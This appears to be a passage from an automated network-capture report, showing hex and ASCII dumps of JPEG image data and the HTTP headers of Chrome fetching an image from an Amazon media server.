                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 07 a3 e2 6e d3 3a 65 e7 b5 88 bf 37 76 dd 27 58 bb e7 b3 c8 e9 da b0 a8 9b 8e 51 b4 fa be 2c 81 9b a9 d5 c0 6a 35 c9 0c 35 f1 73 5b 1c 77 99 ed e9 37 ea b5 d6 36 73 25 57 b1 6d cd 2e 42 8f 53 c6 d4 a6 61 a6 7c 9f 44 62 1b 7e 1f 1a c5 3d cd ee 2f 4c 1f 19 f4 9f 9c 6d 20 55 0b 52 5e f7 a0 54 97 20 28 b2 06 4f d2 5b 7f 82 7d 11 99 99 ad ad 62 eb 7d 63 46 a6 d9 a7 69 67 d1 56 dd 39 a8 17 af 08 7a e7 a3 8a ff 00 d6 5d 98 73 c4 53 c6 e0 bc a5 ea bf 28 ae 8d 02 e3 0b 1a ba af 94 55 31 3a cf d4 fa 07 84 ef 97 cb f4 12 6e 91 77 cc 1e 60 f4 ff 00 93 6e b3 95 ab b0 fa e9 af 64 9a 80 d7 3c 0d 2d 89 86 66 34 e7 43 61 1a 53 a7 a4 e4 72 da 26 f4 8d b2 35 ce ab bb 94 93 54 cc c7 d0 ce 83 21 d5 2c 75 e2 77 9f 11 ab 94 6f c6 9b d8 f2 cd ef da 2f 8f 64 f3 af 4b c5 e1 90 09
                                                                                                                                                                                          Data Ascii: n:e7v'XQ,j55s[w76s%Wm.BSa|Db~=/Lm UR^T (O[}b}cFigV9z]sS(U1:nw`nd<-f4CaSr&5T!,uwo/dK
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff c4 00 32 10 00 01 03 02 04 04 06 02 02 02 02 03 00 00 00 00 01 00 02 03 04 11 05 10 12 21 13 15 20 31 14 22 30 32 33 34 23 40 41 51 42 61 06 24 43 50 60 ff da 00 08 01 01 00 01 08 02 ff 00 d3 cf 5f c2 79 6a e6 ab 9a 2e 68 b9 a2 e6 8b 9a 2e 6a b9 a2 e6 8b 9a 2e 68 b9 a2 e6 8b 9a 2e 6a b9 aa e6 cb 9a ae 68 b9 aa e6 cb 9b 2e 6c b9 b2 e6 ab 9a ae 6a b9 aa e6 ab 9a ae 6a b9 aa e6 ab 9b 2a 69 b8 ec 0f ce bb e6 7f a1 e2 c2 f1 8d 5e 2c 28 e4 e2 0b fa 47 a0 8f 4b 0e f8 5b 9d 77 cc fe 9a 8a 97 44 eb 07 62 07 dc 22 9d d1 bd ca 1a 87 36 36 81 e3 8e 97 b9 3a ad d7 b0 82 4e 2b 6f e8 dd 5f a2 fe 96 1d f0 b7 3a ef 99 fd 32 45 aa 66 95 51 4e ed 52 35 a2 17 eb 42 17 b5 ad 5e 19 da a2 4c 81 dc
                                                                                                                                                                                          Data Ascii: 2! 1"0234#@AQBa$CP`_yj.h.j.h.jh.ljj*i^,(GK[wDb"66:N+o_:2EfQNR5B^L
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: cd ad 62 0e 52 9b 02 54 95 86 7d 37 a7 23 43 6d 7c f1 08 f5 c2 f5 7b 0b a6 3e c4 15 0c a6 ca 27 6f 94 79 d3 fb 06 73 1f 31 5a 95 73 0c 8c bb 6a 8e ad 16 cc 1c bb 22 89 cb 04 7f e3 2d 58 c4 5a a2 0f 41 45 28 6b 81 50 4e d1 74 d9 18 fe ca a7 68 de a8 a9 75 da 47 04 33 2a a6 98 d3 bb 49 84 79 95 3b 6d 96 bb 9d a3 ce 9f d8 dc eb 09 12 39 09 5c ae 4e cb 10 67 0c cb e8 85 83 77 99 c9 e5 b2 34 b4 c9 11 81 c5 86 26 dc dd 43 7b a1 67 2b a8 a1 13 92 0d 15 63 67 04 0e 9a b8 f8 b1 3d a9 92 70 c8 2a 9e a0 9b d8 b8 ff 00 2c 2b 11 a8 d1 c3 0d a3 ae 6d 40 b1 54 fe c6 e7 56 eb 49 22 f1 a2 e9 b2 2c 45 a2 76 9b 7a 2c 7b 98 6e dc 3e b8 cd e4 7d 6c 5c 46 12 a3 77 65 11 5c 40 a2 61 94 d8 55 cc 28 60 7b 84 52 ba 17 07 36 8e b5 b5 2d ba ba d4 b5 22 f5 35 4b 21 69 73 ca 88 06 34
                                                                                                                                                                                          Data Ascii: bRT}7#Cm|{>'oys1Zsj"-XZAE(kPNthuG3*Iy;m9\Ngw4&C{g+cg=p*,+m@TVI",Evz,{n>}l\Fwe\@aU(`{R6-"5K!is4
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: c3 84 20 16 0b 80 11 85 ab 80 2e b8 2d d9 18 02 e1 35 70 5a b8 43 65 c1 09 f1 80 0f e8 60 df 52 0c f1 69 74 54 ca 9c ed 44 93 d2 d1 75 f8 f7 47 86 51 11 ef 6f c4 77 40 44 87 09 5a 34 04 68 88 da 87 0c 2f c6 8f 0d 79 37 56 61 b0 5f 8d 79 13 b4 5b 6f 4b 06 fa 90 67 ff 00 22 00 4e 7a db dc 2b 8d d6 bb 85 c4 d8 a2 f0 b8 9b 15 ab 72 53 a4 b1 5a c2 6f 94 59 6b 08 38 58 2e 20 41 e2 c2 e1 db ad 61 17 6c 83 81 45 d7 ec 5f bd d5 d0 3f ca 0f 45 a5 06 12 b4 95 a0 ab 2c 1b ea 41 9e 3f f7 24 eb 6f 71 6d 6f 44 bb 64 4b b5 2d 4f 57 7a d4 f4 ed 46 cb 53 d0 73 b7 45 cf 57 78 b0 5a 9d 60 89 7d ee bc e8 39 c5 5d f6 43 50 ba bb d5 dc 4d d7 9b 75 a9 ea ee ba f3 ee 86 a4 e9 0a e3 14 e7 ea 58 37 d4 83 3c 7b ee 4b d6 de e1 06 bb f9 70 70 ba 76 ab ad 0e 05 58 ad 2e 0b cc 6e 15 9c
                                                                                                                                                                                          Data Ascii: .-5pZCe`RitTDuGQow@DZ4h/y7Va_y[oKg"Nz+rSZoYk8X. AalE_?E,A?$oqmoDdK-OWzFSsEWxZ`}9]CPMuX7<{KppvX.n
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 0d 96 8b 45 a2 d1 68 b4 5a 13 89 bd 0f bb ff 00 69 ff c4 00 2a 11 00 02 02 01 03 04 03 00 01 04 03 00 00 00 00 00 00 01 02 11 03 04 12 21 10 13 14 31 05 20 32 33 22 30 41 61 15 40 51 ff da 00 08 01 03 01 01 08 00 96 48 c1 5c bc cc 67 9b 88 f3 31 1e 76 24 79 d8 8f 33 11 e6 62 3c bc 67 97 8c f2 b1 9e 56 33 ca c6 79 58 cf 2b 19 e4 40 f2 60 79 10 13 b5 66 a3 f0 86 8a 16 09 35 6a 1f 19 2c 89 b4 be 1f 32 74 4f 13 84 dc 58 84 5f 45 d5 14 51 1f ca 35 1f 85 d6 19 71 24 ad 7c a2 c3 c6 35 f3 b9 a9 22 79 9c e7 29 bb 13 2f ed 65 96 47 f2 8d 4f e1 16 47 13 92 b5 e2 c8 c5 f1 f2 c9 75 ff 00 0f 93 92 5f 09 93 73 4a cb 2c b1 48 dc 6e 2c 4c b3 71 0f ca 35 3f 84 33 16 a2 11 8d 4b cb c2 47 e5 3b 52 4f 13 f9 bc ce cc 9f 29 97 24 64 a5 f5 e0 ae b5 d2 1f 88 99 e1 ba 09 0f 0c 85
                                                                                                                                                                                          Data Ascii: EhZi*!1 23"0Aa@QH\g1v$y3b<gV3yX+@`yf5j,2tOX_EQ5q$|5"y)/eGOGu_sJ,Hn,Lq5?3KG;RO)$d
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: bd 1f a7 b3 5f 9c 53 60 c1 ba 1a 8d 30 b1 98 2b 19 6b bd 18 96 94 29 65 88 70 50 8f fc 91 50 88 0d 0a e1 5a 31 88 66 9f 2d df 1d 5f 86 9f e8 f1 d5 f8 69 fe 8f 1d 5f 86 93 eb 6a a5 2e df 11 d5 7f 50 d7 a7 55 2c dc 48 bb aa 97 3e 9d 54 b9 f4 ea a5 cf a7 55 2e 7d 3a a9 73 e9 d5 18 e3 7e e7 8e af c3 49 97 84 d1 27 b2 21 92 6c 9f ed 9b 63 06 a1 62 31 88 35 f1 4d 1a 5b bf c9 12 7b 2d a3 f8 55 db 52 36 1e 35 a6 a2 5a 6a 91 1f 84 d9 ff 00 22 26 2c b5 40 8c 02 6a 1d 98 40 46 0a d0 37 3c 75 7e 1a 4c bc 26 48 a1 9f 84 c9 1f d9 bb 04 c9 1d 96 4d 9e 68 78 f9 21 e3 e6 87 e1 fc 21 61 f9 42 98 9e d5 08 7e 22 fa 8b 74 51 1b d0 a4 c2 14 46 2a b8 0d cf 1d 5f 86 93 09 1e 4a 51 bf 55 28 df aa 6d a3 81 3b e6 3a bf 0d 37 12 9a dc 71 7e 1a 6d ca a9 e4 fa aa 55 b3 4c 31 42 38 d4
                                                                                                                                                                                          Data Ascii: _S`0+k)epPPZ1f-_i_j.PU,H>TU.}:s~I'!lcb15M[{-UR65Zj"&,@j@F7<u~L&HMhx!!aB~"tQF*_JQU(m;:7q~mUL1B8
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 6c 7d 9d 98 0f 81 89 4f f7 13 fd 24 ff 00 7b 04 40 a8 d4 f4 c0 fc 84 22 06 20 3f 88 7e 5e c7 56 3e c6 cc 06 3a c3 8c ac f1 12 d1 c4 92 dd 8a 6f 29 18 a3 12 51 e8 2d 2d e6 10 99 b6 58 74 44 60 ef bf 84 01 65 48 02 25 30 67 c2 15 90 88 01 56 a6 90 43 f0 58 03 80 e2 1f 8d de 79 b1 f4 36 7c 48 5d 91 2c aa e8 78 cb 65 0f 0a d5 dd 48 98 32 6a e3 43 57 1f d9 18 5c 17 ab 68 c0 11 6e 59 02 d0 36 c4 83 66 90 64 ce 52 c1 93 40 04 19 50 51 c5 08 f8 2c 54 23 05 14 51 45 17 c1 60 a7 79 e6 c7 d8 d9 16 2a 10 04 64 06 78 01 f0 08 83 43 c2 1c 06 02 1f 8b c4 c1 f3 51 41 04 45 87 75 e6 c7 d8 d9 88 86 20 d4 94 c5 c7 37 d8 9c e0 b6 c1 a8 30 82 70 98 e3 c5 c7 1f c0 40 1e 29 44 48 30 26 18 67 71 e6 c7 dc d9 8b d5 37 c0 0b e8 58 83 c8 12 a0 15 ce 1e c7 a4 44 5a 1e 8c 1d d7 f2 55
                                                                                                                                                                                          Data Ascii: l}O${@" ?~^V>:o)Q--XtD`eH%0gVCXy6|H],xeH2jCW\hnY6fdR@PQ,T#QE`y*dxCQAEu 70p@)DH0&gq7XDZU
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ef 95 97 af b4 82 2e 59 fa 03 00 8a 25 38 20 1b 1a 20 06 ce 0a 18 19 81 0d 06 b7 07 53 0c 83 3e 97 30 00 92 da e0 41 33 a2 50 cd c6 ea 0c 3c ff 00 27 11 ec f8 80 43 0e c8 3e b8 fd 67 37 cd 9d f9 fc 00 70 0a ac 4d 1d a4 15 4f 86 d7 84 4d 58 6e 02 fd 6f 08 8e ae d0 02 0b 39 2d 59 b4 12 6a 6c ff 00 be 63 34 ae 66 23 64 f6 82 20 75 d4 d4 d2 10 90 c5 80 e0 7d 77 82 25 0b 3f d8 de 02 46 9f 48 41 04 e3 47 93 04 2c 12 2f 6e 80 95 da 0e 75 b8 26 59 4c 8a 2e 01 40 e5 38 11 63 d1 07 a1 04 79 1e 4e 21 db f1 04 16 d0 26 c8 28 ae 9c cf 1b ed 8a 86 5a b2 ee 28 4e 66 e7 11 ef ce 04 1a 7e d1 e5 38 95 d7 fd 01 ce 00 e6 20 a8 81 68 2c 18 da 35 d5 6f 98 dc 41 59 85 0d 14 63 02 40 58 67 c4 fe a1 25 aa 86 55 52 01 9b 25 0e 90 89 cc 00 f3 06 02 9b b3 78 9a 90 e1 6c 33 e6 61 68
                                                                                                                                                                                          Data Ascii: .Y%8 S>0A3P<'C>g7pMOMXno9-Yjlc4f#d u}w%?FHAG,/nu&YL.@8cyN!&(Z(Nf~8 h,5oAYc@Xg%UR%xl3ah
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: b3 12 38 b0 b9 28 82 83 bd 4f 78 a6 b8 1a dc 5a c0 c3 5c fe 33 42 fd 60 ac 54 16 6d 11 f2 9a 9d a1 d2 c3 ad 75 51 d9 6b 81 ba 2f d9 a3 c1 40 08 80 14 46 62 86 05 4a eb fb 73 83 cd ee e2 ad 0d be 4a 0f 98 c3 d9 dc e2 20 8e fe 59 40 f0 84 0b 00 6f 6d b0 4c 2a f0 3a 48 86 ff 00 5b ca 69 1f 09 28 c9 9c 05 61 0e 9d 22 72 d8 57 86 74 df d7 33 07 1a b4 1f da cd e6 f0 a7 e3 10 fc 44 16 9e ae e7 17 a4 75 15 2d c0 0a 6e 17 42 f3 01 42 68 60 0b 51 8c b0 33 b3 bc 13 d9 ed 62 20 29 d3 74 c7 7f be 00 85 5b fa 1a 08 00 da 15 d2 37 f8 af 04 3f 11 02 86 7a bb 9c 7d 06 89 6f 8f 28 9e 08 47 91 fa 9c 28 47 81 cf bc 10 84 ac b6 6b 2e 17 9f 81 ce 04 75 51 29 5c 14 8c 15 86 26 b7 56 f1 1d 8f e1 18 88 7e 59 a7 ab b9 c5 be ad 11 01 9b 69 18 b5 2e c7 fb 38 90 e9 57 99 41 e4 63 a9
                                                                                                                                                                                          Data Ascii: 8(OxZ\3B`TmuQk/@FbJsJ Y@omL*:H[i(a"rWt3Du-nBBh`Q3b )t[7?z}o(G(Gk.uQ)\&V~Yi.8WAc


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          27192.168.2.1649743151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:56 UTC445OUTGET /images/M/MV5BMDdmZGU3NDQtY2E5My00ZTliLWIzOTUtMTY4ZGI1YjdiNjk3XkEyXkFqcGdeQXVyNTA4NzY1MzY@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:37:57 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 37893
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: f656fb5f-02db-44f7-b84d-e6fc0313d740
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 02 Oct 2016 16:03:19 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sun, 09 Oct 2044 16:04:16 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2231431
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:57 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000048-IAD, cache-nyc-kteb1890032-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bf 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 01 02 08 00 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 2f 58 5f 1c e9 e6 7a 50 94 67 91 5e be 60
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4/X_zPg^`
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: f4 57 15 8b 1f a0 bc 09 df 5c dd be ca 59 95 f4 62 51 01 a2 d2 38 e1 7c 0a 27 85 b1 4b 29 e0 15 77 4f 66 db fb de db de d7 6d b1 ef 67 66 ad d5 ce da 79 4c a6 d5 15 b5 d9 0d d6 ce da 6d a8 fc 1b 84 55 02 1d f3 2c 96 03 d5 ca eb 4c b6 bf 3a 7b 26 be c8 77 bf ce af a1 dc 9d b8 df 4f 4e eb e5 35 76 8d 39 2e 3b 06 07 a3 45 40 22 d9 5d f3 30 51 c2 09 95 d9 aa cd 94 d9 3d 9b 6f 9f 7b 61 8e 44 be 2a b6 cc 56 05 c6 9a a9 8e 9e df 3b 27 07 20 96 57 94 35 97 cb b5 8b e5 12 cf 57 23 8d 33 e3 90 f6 6b f4 67 9f 44 7e 5e 75 ef 93 e8 74 d2 62 4b 58 f9 46 fb be 51 9b 86 bb 01 22 9a d9 5e 39 8a c9 36 5b c9 6f 8e 52 51 1d b1 b2 3b ec e1 66 cb 6c 25 34 35 ac 96 f2 3b ec bb e0 ce 95 89 09 7b 5f 23 11 f2 9c d6 c9 1c 49 25 7a b9 56 f6 a9 3a be d5 1a f5 1d 60 3a eb cd d0 9d 9d
                                                                                                                                                                                          Data Ascii: W\YbQ8|'K)wOfmgfyLmU,L:{&wON5v9.;E@"]0Q=o{aD*V;' W5W#3kgD~^utbKXFQ"^96[oRQ;fl%45;{_#I%zV:`:
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 2d 43 8d a5 5a ea d2 f3 22 b2 03 d5 f6 d1 75 1f 36 01 45 b3 9e 72 9d bb b5 a4 1e 01 e0 6c d1 11 24 76 b0 15 e6 ab 34 ad a9 0a 69 80 74 73 5d b5 e9 89 77 b1 17 0e 96 94 0c 33 fc 5c 37 4d a3 a1 06 ba 2b b0 24 d2 d6 6c b6 89 fb 65 fd 8d 31 7c 8f b1 b2 ba a3 ec 5c 7b 44 88 f2 0b 22 0f b6 d7 d8 6d 9d 37 c7 de 70 ae cc bc ba 5b 6b 8d f7 db 67 68 ac 43 bc 0c 58 87 ba b2 f0 cf d5 0e b6 c5 5c c7 df 1c f7 23 7c 41 44 10 5c 1f ff c4 00 31 10 00 02 02 01 03 03 02 05 03 03 05 01 00 00 00 00 01 02 00 03 11 04 12 21 10 13 31 05 22 14 20 32 33 41 06 23 30 34 42 51 15 24 43 44 61 52 ff da 00 08 01 01 00 01 08 02 b2 ac 91 35 6d 80 14 04 98 0b c9 dc 22 ed 33 b5 36 c6 7e 31 3c c4 ae 00 90 76 e6 c5 3e 1a 97 1e 0b 62 63 33 4a 80 a4 d9 b0 c6 dc 1b 10 bf f8 4a 4d 9f 53 e9 95 27
                                                                                                                                                                                          Data Ascii: -CZ"u6Erl$v4its]w3\7M+$le1|\{D"m7p[kghCX\#|AD\1!1" 23A#04BQ$CDaR5m"36~1<v>bc3JJMS'
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 4d 1a 62 b5 86 37 f9 0d ef 8a 62 99 6d 7b 7d c2 ff 00 f3 34 f7 f7 87 24 43 04 5a f1 36 4b d3 89 a9 1c c3 0c 51 10 45 8a 66 66 89 f2 b8 84 66 11 0f ca 63 54 22 ae d3 91 66 76 4b 17 74 35 fe 05 69 b5 b1 34 e3 08 b0 f1 33 88 e3 3c 8d d9 82 f0 3c fc 62 78 97 b0 3f 4f 79 ab e4 69 35 63 52 21 5e 95 dd 99 9c cd 43 00 a4 cb 8e 72 7a 62 2a c4 13 10 74 a2 de d3 66 25 81 a1 84 4c 74 c4 b6 d1 5e 32 75 82 7c 46 41 88 73 2c fa 4c 5f c9 9a 3a b9 6b 0f 96 cc 41 80 21 8c 92 d6 ed f3 2c d4 ef 31 c1 f3 2d ab b6 a3 6a 38 56 c9 b2 c5 75 85 5a 92 08 d3 eb 7b c3 06 12 27 7e 5d 63 34 71 08 81 22 24 54 9b 66 d9 89 89 55 a6 b8 96 6e ea 44 c4 b1 37 09 b3 f0 c0 45 38 8c f9 0d 12 7d 78 ad 75 08 01 a5 04 3d 35 6f bc 91 05 6b fd d7 80 de d1 f8 c4 a9 53 3e f1 68 3e 31 f9 8a 99 94 5a de
                                                                                                                                                                                          Data Ascii: Mb7bm{}4$CZ6KQEfffcT"fvKt5i43<<bx?Oyi5cR!^Crzb*tf%Lt^2u|FAs,L_:kA!,1-j8VuZ{'~]c4q"$TfUnD7E8}xu=5okS>h>1Z
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 97 8d b0 7a 2f 20 41 e9 e9 b5 2c 2b a6 4a c6 a4 dd a8 f4 c4 d2 f7 99 e9 f4 ce f8 0e 3f d1 be 93 2d d1 1a 95 cc d1 69 06 a0 5a 62 e8 4b f6 da 59 47 6a b5 b2 37 a5 80 c7 23 d2 ec dc 04 af 40 c7 02 23 1d 1f 6e d1 4d c3 1b 97 ab 73 3d 50 ff 00 b7 26 29 f9 c4 df bd f7 0f 59 b8 3b 0a 55 46 65 94 6c aa 8b 3a 58 f8 f6 c2 65 5a 8b 29 04 27 fa 85 fc 99 f1 76 e1 96 2e be f5 c6 17 5f 72 9c 8a b5 76 53 bb 6a 6b ee 4f 15 df aa dd dd 15 be a6 a0 15 6d 37 3a fb f4 f7 bd 39 d9 f1 56 02 48 36 12 bb 67 c6 5b cc 6d 6d be ec b7 a8 5d e4 db 71 60 01 f4 fd 5f c3 9c 35 6d 8f 6f c9 ae a3 bd 5b 28 b4 e0 39 8b c8 f9 33 d2 f6 18 d9 35 ba af 85 fd c3 e7 24 c7 d4 6f a6 9a e1 6d b0 ff 00 06 9f ee 24 a8 61 17 28 3c e5 be 96 97 fe 20 3d 3c 43 ce 21 87 a7 a7 6a ff 00 e0 74 72 78 33 44 4e
                                                                                                                                                                                          Data Ascii: z/ A,+J?-iZbKYGj7#@#nMs=P&)Y;UFel:XeZ)'v._rvSjkOm7:9VH6g[mm]q`_5mo[(935$om$a(< =<C!jtrx3DN
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: cc 09 6e 65 da ab 2a 30 0b 53 6c fd e9 ba ef 71 83 bd cc ad 2e 0a 30 56 d2 ea 67 ee cf dd cc 56 b5 b3 87 73 58 01 b7 59 e6 7b d7 26 1d e3 99 70 62 c3 29 b4 7b db 4b 67 18 1f 8d d3 d4 2c b2 a7 18 19 73 c3 1c 1c 12 43 6e 31 c4 3e 62 fd b5 95 8e 5e 38 e6 27 e2 69 fe 9a e1 fc 4c 66 d8 7c c3 13 ea b6 13 ef 48 e0 f1 2d fa 5e 7f 74 ab c9 33 f1 54 fc cd f9 7b eb 87 c4 ac 60 08 7e b1 0f e7 32 a0 79 8d 5e f7 13 1e 04 b7 c4 69 ab 3e e5 95 85 dd 05 cd 5f 10 15 b0 2b 42 a1 fc 98 1d b1 b2 57 e5 41 db bf c6 9f 73 b6 1a ba b3 81 1a 8d a1 8c ec 9e 26 cc 05 30 69 ff 00 10 52 5a 57 b9 9d c1 f8 73 16 93 37 dd cb 05 a8 9d a4 f6 98 e3 2d 4b 71 3b 2f 98 16 cc b4 34 b8 da b0 d3 60 9f 0c 41 63 02 da 79 95 ef 3d c8 6a b3 31 c5 82 6c b6 3e fa c7 14 ef 72 66 2c e6 35 6f e2 61 db 99
                                                                                                                                                                                          Data Ascii: ne*0Slq.0VgVsXY{&pb){Kg,sCn1>b^8'iLf|H-^t3T{`~2y^i>_+BWAs&0iRZWs7-Kq;/4`Acy=j1l>rf,5oa
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: d9 09 f7 28 4a 13 b1 08 f3 ac d6 01 28 99 8b 06 a2 cc cb fb f8 2b e2 ae 6d f4 7f ad 4a 95 2b c6 2c 15 f9 19 53 29 b7 3f d6 81 94 44 0f e4 ac af 15 2a 63 c5 66 cd 78 7c a1 04 e4 e4 c9 8c 8e 4a e3 cc b9 54 3a 79 d7 c6 b2 bc 6b dc 2b 0a 09 51 71 96 31 56 a1 8f 98 20 a8 5a fe 50 0e c1 cd c6 7e 0b 9c d8 31 e7 4c a8 1d 3c 54 d2 e0 c3 1a 87 83 70 cd 6c 4d 2e 2a 85 10 4c 99 75 e8 13 d9 97 17 ef c6 6e 33 f0 5c f2 30 26 65 c8 81 d2 2b 7d 4d 28 d4 ae a3 81 3a 86 a6 aa 61 b1 d4 51 f7 2b e2 36 4d 44 2d e2 aa 03 e0 80 41 05 f1 b7 f8 ec 9b a8 70 c0 32 c0 f6 3b f6 8a 84 c2 2a 0c b3 7e e0 b8 05 42 f5 0b 92 65 f9 06 6f 0b 8a 8c 15 c1 56 52 78 39 3d 4c 07 8b f1 ac d4 ca 80 50 81 ba b2 5b 63 7f d3 36 72 95 af f3 1c 35 44 c8 1d 43 42 04 a1 32 f1 93 32 1c 79 38 b9 df 13 9e 26
                                                                                                                                                                                          Data Ascii: (J(+mJ+,S)?D*cfx|JT:yk+Qq1V ZP~1L<TplM.*Lun3\0&e+}M(:aQ+6MD-Ap2;*~BeoVRx9=LP[c6r5DCB22y8&
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 97 cc 42 67 30 4b 61 2e e3 37 d0 89 8f 68 16 bb b0 ed 74 6c 26 51 d4 ae a6 ab 82 4c 64 a3 c0 c5 00 81 a7 8e 6b 18 80 25 c0 b7 02 80 3f 02 0c d2 04 37 00 65 36 b7 e7 4d 81 30 f7 de 06 10 98 4d 98 57 9e 15 00 1f 86 3c 41 bd ff 00 15 4a c7 42 a6 a0 26 59 89 95 91 83 2e 45 0e be 64 95 cc a1 09 10 3c 2d d9 53 b0 26 84 d8 cd 8c d8 83 37 69 cc 1e ae 08 c3 99 8b 3f 8d b9 cb 87 43 c1 9c c2 4c 0b 0c 55 ee 3d 41 f7 07 dc 1e fb 8f d7 b3 10 4f 13 13 87 5f 0b b2 90 68 cd 3b 55 c1 dc 7a 83 ee 7f 7f 80 fd 7b 38 a2 3b 03 46 64 ac d8 c6 51 70 3c be de 07 9e 26 02 cf 89 8f a1 8d aa 5f 34 7c 6d 34 68 5a bd f2 45 8e 54 73 4c 3d 94 73 3c 6d 3c 6d 31 b9 c6 db 1c d8 74 6b 17 53 df 6f 29 96 48 81 fe a1 c9 5c 42 4c f2 40 f1 9c 0e 48 34 b5 19 c3 4d be 2a 21 c9 71 b2 8a b8 5e e8 8c
                                                                                                                                                                                          Data Ascii: Bg0Ka.7htl&QLdk%?7e6M0MW<AJB&Y.Ed<-S&7i?CLU=AO_h;Uz{8;FdQp<&_4|m4hZETsL=s<m<m1tkSo)H\BL@H4M*!q^
                                                                                                                                                                                          2024-12-15 11:37:57 UTC1378INData Raw: 19 ba c2 6e b3 ef 51 c5 64 30 25 69 ff 00 68 da 6e 59 46 d0 31 ce 96 a3 b4 a9 00 36 26 1c 5a 12 03 18 71 5b 25 f9 7e 8a 7c eb 16 fd 0a 85 c6 87 aa 74 51 01 da 42 1c bb 04 5f 55 2e c4 bb cc d7 94 7a 9d 93 b1 0c 9c 8c 4e 8d d3 f2 ee 94 84 ca 3f 86 63 54 db 3c 80 86 56 ed 16 d8 bc d8 26 39 82 d6 a7 8f 11 e9 cd cb 5d 0f 60 c9 50 c0 3a a5 69 e3 ea bd 54 2e ec 62 d3 52 b3 39 b8 6d 92 8b 00 c6 a7 a5 6b eb e9 20 57 7a b5 65 80 f6 b3 59 9d a4 20 6d 0f 6c f3 64 94 d5 b8 1c fa 3e 5a 53 0e 69 92 e6 99 cf 2d 0d 5a a6 fc a7 e4 d0 3f 5e c2 11 11 ee df 76 9d 86 0b e9 d5 72 9f 65 ea bd bb 1d 02 d3 62 6a 24 02 db 72 0c 8b 05 97 59 3b 10 ff 00 c6 c4 b1 6f 22 9c 04 26 4a 91 6c e3 b5 56 c8 69 a5 f4 c1 e6 18 45 1d 9c 28 b4 cb 4e cf 92 ce b7 a6 73 dd cf ba 73 da fd 57 e7 b6 d9
                                                                                                                                                                                          Data Ascii: nQd0%ihnYF16&Zq[%~|tQB_U.zN?cT<V&9]`P:iT.bR9mk WzeY mld>ZSi-Z?^vrebj$rY;o"&JlViE(NssW
